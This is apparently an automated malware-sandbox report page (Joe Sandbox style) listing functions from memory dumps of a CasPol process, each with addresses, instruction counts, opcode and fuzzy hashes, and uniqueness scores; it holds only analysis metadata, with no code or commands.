Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2315418ba4c52300efc1254f39ecfaa2864913d0a62ff21846d6b48b3aa5ed88
Instruction ID: 097b8522da2e65b81a32d3d941a1720b3a0e8c09fd5ceba0cb90b2c0c45fd0bc
Opcode Fuzzy Hash: 2315418ba4c52300efc1254f39ecfaa2864913d0a62ff21846d6b48b3aa5ed88
Instruction Fuzzy Hash: 33C1D838955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF258 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4453f5aca9171801eff34f01a12cc191501f5a341b94ca0fefed15bcdeff3bdc
Instruction ID: dd2fe75d0bf0562e28043aea60fc8a1c4295b8904c8182bf165103b6df3fa49e
Opcode Fuzzy Hash: 4453f5aca9171801eff34f01a12cc191501f5a341b94ca0fefed15bcdeff3bdc
Instruction Fuzzy Hash: FCB1D838955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF29D Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc16266b204cda0164880d7d96cb632c474907fc705cceda934e7263f2b0c69b
Instruction ID: 66a8b24d957374a992861242c043b32350a38a108fb13a45f8bfa949b8088d83
Opcode Fuzzy Hash: dc16266b204cda0164880d7d96cb632c474907fc705cceda934e7263f2b0c69b
Instruction Fuzzy Hash: EBB1E838955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF2E2 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf32b4fd0850fe2079b0518730d1b975cde0037c81bc9d8f17041a89a3f573b
Instruction ID: aca8ceefcc64af1d1ca27836b187bd59580ad925e05311b5d4cddccf402d6501
Opcode Fuzzy Hash: 9cf32b4fd0850fe2079b0518730d1b975cde0037c81bc9d8f17041a89a3f573b
Instruction Fuzzy Hash: 78B1E838955328CFCB65DFB0C88868AB771FF49305F5081EAD40AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF327 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1cf720cef8c0de599929999b86dbba40b5fdc5fc7fb0f2dede5daf6bcad9ea8
Instruction ID: 97ef5ab4b775cfe4e711414c55c8824c63f82e8998709bfb5cf7dac2ebbf73ed
Opcode Fuzzy Hash: a1cf720cef8c0de599929999b86dbba40b5fdc5fc7fb0f2dede5daf6bcad9ea8
Instruction Fuzzy Hash: BEA1E838955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF36C Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c094e8b719b9e24f7454687dbda2a1808f0f0fc0bad34a3d2789ccc391cc764
Instruction ID: de92787594a66578c7ce1ead1706fbc25361451a99bc53b698e25243d26c20ad
Opcode Fuzzy Hash: 6c094e8b719b9e24f7454687dbda2a1808f0f0fc0bad34a3d2789ccc391cc764
Instruction Fuzzy Hash: 50A1E838955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AC958 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74f8ef529261cb0aca9102711da7285fdfb23161f30d621b3d58a670f660d2b
Instruction ID: 9f9932337ccd340ec231e409ae25da1f74f09a9642f6896099fd09a718aac680
Opcode Fuzzy Hash: b74f8ef529261cb0aca9102711da7285fdfb23161f30d621b3d58a670f660d2b
Instruction Fuzzy Hash: 3761C2387481058FD704DF68C458AAD7BF6EF89704F2144AAD516EBBA1DB719C01CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A41B8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77dcfc9e05e8c53a40194820867f2fec90b3c253e0ae65dbff9ec2013f21964
Instruction ID: 109736208d2375b5b3cebafa2dd4bdb6eec4428d1a7f484876d64e82e047c156
Opcode Fuzzy Hash: e77dcfc9e05e8c53a40194820867f2fec90b3c253e0ae65dbff9ec2013f21964
Instruction Fuzzy Hash: 8861C331B44159CFCB04CFA4C454AAD7BB6FF88710F218069E929AB750CB31DD52CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF3B1 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d146c943576e51901d39d5de0fbcb59214e2bc3537474d2e2899593afe545a
Instruction ID: 75a9d324ecfe3fd6fa57d9cf3f394d5a4280438f737551e4024e6842b285a5a6
Opcode Fuzzy Hash: e6d146c943576e51901d39d5de0fbcb59214e2bc3537474d2e2899593afe545a
Instruction Fuzzy Hash: 9FA1E838955328CFCB65DFB4C888A8AB771FF49305F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCEF8C0 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c467fccee5c62f5d50bb4109bc6543b0a0f887a6663ba82a3b2462e0d8b5d08
Instruction ID: 26e260a413da631942d57ff32178cd4d82c0c89b16aeb0882c7deb5dbf26930c
Opcode Fuzzy Hash: 4c467fccee5c62f5d50bb4109bc6543b0a0f887a6663ba82a3b2462e0d8b5d08
Instruction Fuzzy Hash: 3151D335B043158BCB14DFB4C8A826E7AA2AFC8314B55C839D806DB385EF75A946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF3F6 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f3998409708f4345e0d9ed3e04e48e016aae6a631855ace3589e04b8555a72
Instruction ID: 255343b203a1ee095d1a46f8a5e00f64e57dd14bd9cbb38e8482161da827ccab
Opcode Fuzzy Hash: 02f3998409708f4345e0d9ed3e04e48e016aae6a631855ace3589e04b8555a72
Instruction Fuzzy Hash: 7291F838955328CFCB65DFB0C888A8AB771FF49305F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A3EF0 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9f3f248eabd3f50bee63859c6e7a3c31ad3773d792a4d3f21d9f8d97a29796
Instruction ID: 35d1b79db4db6759f4b2ea63eb22d027981d7b646921311d5ae4e9bb314142b1
Opcode Fuzzy Hash: ae9f3f248eabd3f50bee63859c6e7a3c31ad3773d792a4d3f21d9f8d97a29796
Instruction Fuzzy Hash: FF51373034C3818FC3159B35D894A2A7BB5EF86310B0144BED55ACBBB2DB61EC05C762

Uniqueness

Uniqueness Score: -1.00%

Function 1D2ADE3C Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf79a43177c906d8061f2e65cdf56440b8a64ff4aa18db60250490f0b5108f06
Instruction ID: 88f13d291878b048c60a3f61cc93cde1abd3dfd88c21f65cff0e087cca8f77a6
Opcode Fuzzy Hash: cf79a43177c906d8061f2e65cdf56440b8a64ff4aa18db60250490f0b5108f06
Instruction Fuzzy Hash: 77516F38B042208FCB44EBB4C49866E7BF6AF89715B228439E516DB345DF39DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF451 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07cb1e1ac7d7c301854d79b38564bb8291738a77f2f324802979a92180b04704
Instruction ID: 96644e93623f5cfd663f4c01b50a38e6aeab2703f23a86911a627d1d496d6f09
Opcode Fuzzy Hash: 07cb1e1ac7d7c301854d79b38564bb8291738a77f2f324802979a92180b04704
Instruction Fuzzy Hash: E491E838955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF499 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d706eda91789e8b9599b2be2eb6252ffb88e3d571bf1d012a507a7ff8bb9806
Instruction ID: 2998302eb97a44cd2fc3c8ce8e1c02d2be309d47af2e24ddcc7dfd925126eef7
Opcode Fuzzy Hash: 0d706eda91789e8b9599b2be2eb6252ffb88e3d571bf1d012a507a7ff8bb9806
Instruction Fuzzy Hash: 7481D738955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCED778 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94206c00d24b87ddc75dcfec4bf96dd1b9b34cee78be79e4ff00c18fc18e7352
Instruction ID: cc9d760d22db0cfe3e165543d158ee4467bd5991d431319276320b42dff46ef3
Opcode Fuzzy Hash: 94206c00d24b87ddc75dcfec4bf96dd1b9b34cee78be79e4ff00c18fc18e7352
Instruction Fuzzy Hash: E051AE35B082148FCB00EBB8D89469DB7E2EFC8314B158579D915AB768DF32EC05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF4E1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3050e942956d0501342bdc450ab0bc59cc5b0dcad93c6977713526df911ce5a
Instruction ID: 6382d3fc17dbf269389d3748999c36f0c19d672a89af7e29ff44eb69734fc76e
Opcode Fuzzy Hash: e3050e942956d0501342bdc450ab0bc59cc5b0dcad93c6977713526df911ce5a
Instruction Fuzzy Hash: A571E938955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCEEDF8 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b3cc896d77f2a624e911781c7912f7bed0a29401d053caf872d8dd812ad9a5
Instruction ID: 69b1fea05a212e749eff14956f6ec0bef00521b3ba79addf309fceeb4a73107f
Opcode Fuzzy Hash: 73b3cc896d77f2a624e911781c7912f7bed0a29401d053caf872d8dd812ad9a5
Instruction Fuzzy Hash: 6A619178D04228CBCF14DFB4C89899DBBB1FF88321F50856AE51AA7350DB35A85ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF51D Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57a97fde5cd611af187b0644b07c8d4b1e101f680578aaeadf672150dc56a07
Instruction ID: f6ef12f228bd2b45521a773fc9dfaf3ea7acb4fffb5522ee9e0275e60470f866
Opcode Fuzzy Hash: d57a97fde5cd611af187b0644b07c8d4b1e101f680578aaeadf672150dc56a07
Instruction Fuzzy Hash: 7171E738955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2ADC10 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ebdbe6d215b15c7ef71919bead11e86d7c521c7f2dce57fce4fdaa09c1d350e
Instruction ID: 467c2f761ac4a212dfac3f15f8d022d5cbda347b72739701c03d187f03cda5da
Opcode Fuzzy Hash: 4ebdbe6d215b15c7ef71919bead11e86d7c521c7f2dce57fce4fdaa09c1d350e
Instruction Fuzzy Hash: 59519138F002289BDB05DFB584942AE7BF3BFC8724B51E429E802D7384EF7198168B55

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A69C8 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d78a3e334d78a0c090db2da537225b03a3b01059afd6da2369f344f000a65db
Instruction ID: 67c9852908fad3c540727f5ed2765adf7eccbec5cbad2b2cc0c22a11ad5c0e92
Opcode Fuzzy Hash: 3d78a3e334d78a0c090db2da537225b03a3b01059afd6da2369f344f000a65db
Instruction Fuzzy Hash: 7C415B317487624BDB154675889427A36E6EBC4301F29C0BAD529CBB92DF74CC45C353

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF565 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecb3db1921792ea994e295c37406d71166add300aa94d8632f1abd1f3b9c4cb
Instruction ID: 785f9bfe07e1f10c18890d24ef9fe14b2d709affd1af7d57d74c6198cac3f185
Opcode Fuzzy Hash: fecb3db1921792ea994e295c37406d71166add300aa94d8632f1abd1f3b9c4cb
Instruction Fuzzy Hash: B171D838955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2ADC20 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32263a17aae15566a49ee8808e90c8a7a62889f835339f34c03e206d5f8349bd
Instruction ID: 7d0f2ad04d6b5f6e71242d6558f5d80dc511c3a4309592438f3af6864b099f9a
Opcode Fuzzy Hash: 32263a17aae15566a49ee8808e90c8a7a62889f835339f34c03e206d5f8349bd
Instruction Fuzzy Hash: 8C418038B002188BDF05EFB5849466E76F3BFC8624B51D429E806DB384EF70DC4A8B55

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A6670 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d43ae4f1bb42de9f21156762fa0d0f4f5d4e51c9371a5dc77053f5a17e5fa1
Instruction ID: a12e4499205d1e33827c0d0b3ceb4dee591091f54ebc66fbfad93d2643cad2be
Opcode Fuzzy Hash: a8d43ae4f1bb42de9f21156762fa0d0f4f5d4e51c9371a5dc77053f5a17e5fa1
Instruction Fuzzy Hash: 6A511075D006498FDB20CF99C884B9EFBF5EF88314F208069D429AB250D775AD4ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AC1F4 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d844dadfd84afc6733f35787ae2b344cfbe93928dc7046f44c84bfdde338f47
Instruction ID: 0be19badeed6bd353af50f9ade767fe4615746a31795f8c79a502838f9122fb4
Opcode Fuzzy Hash: 3d844dadfd84afc6733f35787ae2b344cfbe93928dc7046f44c84bfdde338f47
Instruction Fuzzy Hash: 9D511574D002198FDB04CFA9C8847ADBBF1FF48714F118529E82ABB751D774A844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AC5CC Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e4f64383032a80ae8a92dfd41748dadbd7207d0838bb0ea7297325fcaffb247
Instruction ID: b9e0c5d4e726c4abade52ad5b899c88cdfbca1cfbc652e853d0b2c52f7b253a8
Opcode Fuzzy Hash: 4e4f64383032a80ae8a92dfd41748dadbd7207d0838bb0ea7297325fcaffb247
Instruction Fuzzy Hash: 8A511574D002198FDB04CFA9C8847ADBBF1FF48710F11852AE82ABB751D774A844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF5AD Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e66b00ccd88183ad5dd5d738b9fd9b8d50aa2d6b861d8ca82ba970cd4d535a
Instruction ID: b65ef0d018372e13d764afbafdf0f0104030a550c534bf7dfb642d3d785de298
Opcode Fuzzy Hash: 47e66b00ccd88183ad5dd5d738b9fd9b8d50aa2d6b861d8ca82ba970cd4d535a
Instruction Fuzzy Hash: AC61E838955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCE6920 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09853ae110615fc92914b008f4602ce6e5fdc612fb7a95567a8cf86f9486304
Instruction ID: 5c46a1f7e6b730373aa87db94d280cd73582bedb1ba6883fafb668aff8670b68
Opcode Fuzzy Hash: b09853ae110615fc92914b008f4602ce6e5fdc612fb7a95567a8cf86f9486304
Instruction Fuzzy Hash: CB41F9717283968FC701CF24D85466E7FA6EF86210B05846AF946CF2A3DB34EC15E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AC751 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941272bf073b4b79d9f7b0f113dceafe3361af5c63f1bafebc65c809e522c0ab
Instruction ID: 801a91f1b60c9a927f158d925162c60f8837a1f2c2db41bc7c29cc6baca22cef
Opcode Fuzzy Hash: 941272bf073b4b79d9f7b0f113dceafe3361af5c63f1bafebc65c809e522c0ab
Instruction Fuzzy Hash: 8E511474E002198FDB04CFA9C884BADBBF1FF48314F15852AD82ABB751D774A844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A6660 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc5d302528aa66ad4002b2cd073166bcd00bb9183e9e1fc6e851251d7024370
Instruction ID: 894b4cd6eb5bec3a80d09cad089dc1ca035ed3e8db9892c458c920b552638e71
Opcode Fuzzy Hash: fbc5d302528aa66ad4002b2cd073166bcd00bb9183e9e1fc6e851251d7024370
Instruction Fuzzy Hash: D5513275D006498FDB20CF99C884BDEFBF5EF88314F248059D428AB651D774A84ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A3FB8 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c7d20ecaf0cd35cf44cea6d1cb7444f82580d077d2dd233dff0903eacff79
Instruction ID: 6edf537c55350d1e9fa6fddfb9fa56bdf09f7d5148e01ccb02a103f13206a043
Opcode Fuzzy Hash: fd4c7d20ecaf0cd35cf44cea6d1cb7444f82580d077d2dd233dff0903eacff79
Instruction Fuzzy Hash: A2418E343482518FC308DB39D494A297BE5EF8975471544BDE91ACF7A2DE31EC0ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF5F5 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 310c6994dfdd59420dc65d8d6aadf95727add1118bfe97919483a8f26b060341
Instruction ID: eb6dba9a259cd38bf0c2f97c737c2d261ccf37ab0b9063b3815cee9475213fe6
Opcode Fuzzy Hash: 310c6994dfdd59420dc65d8d6aadf95727add1118bfe97919483a8f26b060341
Instruction Fuzzy Hash: 2751F838955328CFCB65DFB0C888A8AB771FF89315F5081E9D40AA2754DB359E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA660 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d565cb8932a8176aac65e0805972042233c1d0893f6a066d91587f5c046bd1a
Instruction ID: 05868be6953b9e2dd047efa28ed7de382c88d9290e829cbcf21e6a3c5a33863e
Opcode Fuzzy Hash: 1d565cb8932a8176aac65e0805972042233c1d0893f6a066d91587f5c046bd1a
Instruction Fuzzy Hash: 0C4188346442168FDB05AB74C8586AF77F6EF89708F214079D416DBBA0DB35DC02CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF63D Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef09c924f870eaf5b46477d839d00e3775821f309c34f78a5719615b178d2d56
Instruction ID: 1fbbb4de4dfdc6974313f1def9c66f76a0f2dee5a52973371b487b95404d77a3
Opcode Fuzzy Hash: ef09c924f870eaf5b46477d839d00e3775821f309c34f78a5719615b178d2d56
Instruction Fuzzy Hash: 9D51F838955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF679 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba0bf3b57eedb82a4f5bed955c097ccad5f88cf7f0d4a198ec5b937c92febbd5
Instruction ID: 6d15c42e4014e4686edd4fd258a08d2d42541f16361761a6d8a1ebbf0ee868d0
Opcode Fuzzy Hash: ba0bf3b57eedb82a4f5bed955c097ccad5f88cf7f0d4a198ec5b937c92febbd5
Instruction Fuzzy Hash: C051D438955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AD9C8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

